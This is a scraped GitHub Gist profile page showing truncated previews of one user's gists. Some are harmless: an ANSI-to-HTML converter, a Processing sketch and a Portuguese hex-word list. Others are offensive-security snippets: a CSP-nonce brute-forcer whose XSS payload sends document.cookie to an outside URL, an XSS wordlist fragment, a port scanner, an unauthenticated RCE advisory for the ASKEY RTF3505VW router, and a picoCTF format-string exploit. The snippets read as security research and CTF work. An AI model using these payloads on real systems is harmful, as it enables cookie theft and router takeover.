Skip to content

Instantly share code, notes, and snippets.

-
.
..
...
....
.AMRU
.json
.onion
.txt
0
@caioluders
caioluders / ansii_to_html.py
Created December 8, 2023 21:27
gpt made it not my fault does not works. You're supposed to have css rules for the colors
import sys
import re
def ansi_to_html_custom_tags(text):
# Define the mapping from ANSI codes to custom HTML tags
ansi_to_html_map = {
'\x1b[0m': '<g1>', # Reset to default, removing the closing tag
'\x1b[1;30m': '<g2>', # Gray2
'\x1b[1;47m': '<ww>', # White
'\x1b[37;47m': '<ww>', # White
<?php
ini_set('memory_limit', '-1');
$hash = '3e09eb42';
$charset = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$prefix = '<script nonce="3e09eb42">window.location="https://url/b?"+document.cookie</script>';
$charset_length = strlen($charset);
function check_hash($string, $hash) {
return hash('crc32b', $string) === $hash;
}
import processing.svg.*;
void setup() {
size(1000,1000);
float p = random(0,500);
float n = random(0,500/10);
background(255);
beginRecord(SVG,"shell.svg");
for (var i = 0; i < 500+200; i += 3.5) {
noFill();
Set-Cookie=test=test
"--><svg
"><script>prompt("exr")<
$
$1
$a
$account_id
$code
$$
$Any$
$shop$
$your-shop$
%20%44omain%20%3d
%2f%2f%2fbing
%60x
%domain%
%user%
%your_domain%
@caioluders
caioluders / dicionario_hex.txt
Last active April 24, 2022 01:46
Todas as palavras em português que podem ser escritas em hexadecimal. Dicionario fonte : https://www.ime.usp.br/~pf/dicios/
abaca7e
abaca7e5
abac1a15
abac1a1
abac0
abac05
abade
abade5
abade55a
abade55a5
import json, socket
print('Loading function')
def portScan(ip,ports) :
r = []
for p in ports :
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
Unauthenticated RCE as root on ASKEY router RTF3505VW through GET parameter
------------------------------------------------------------------------------
The router RTF3505VW, which is distributed by Vivo, is vulnerable to a unauthenticated RCE via a GET parameter. The vulnerability resides on the /bin/httpd, as it passes a GET parameter to a system call, see the vulnerable portion of the binary below.
if (iVar1 != 0) {
system("killall ping traceroute > /dev/null 2>&1");
__format = "ping %s -c %s -I %s> %s&";
puVar4 = auStack10144;
from pwn import *
#p = process("./echoback")
p = remote("2018shell.picoctf.com",37402)
e = ELF("./echoback")
print p.recv(1024)
payload = fmtstr_payload(7, {e.got["puts"]:0x080485ab,e.got["printf"]:e.plt["system"]} , write_size='byte')
print len(payload)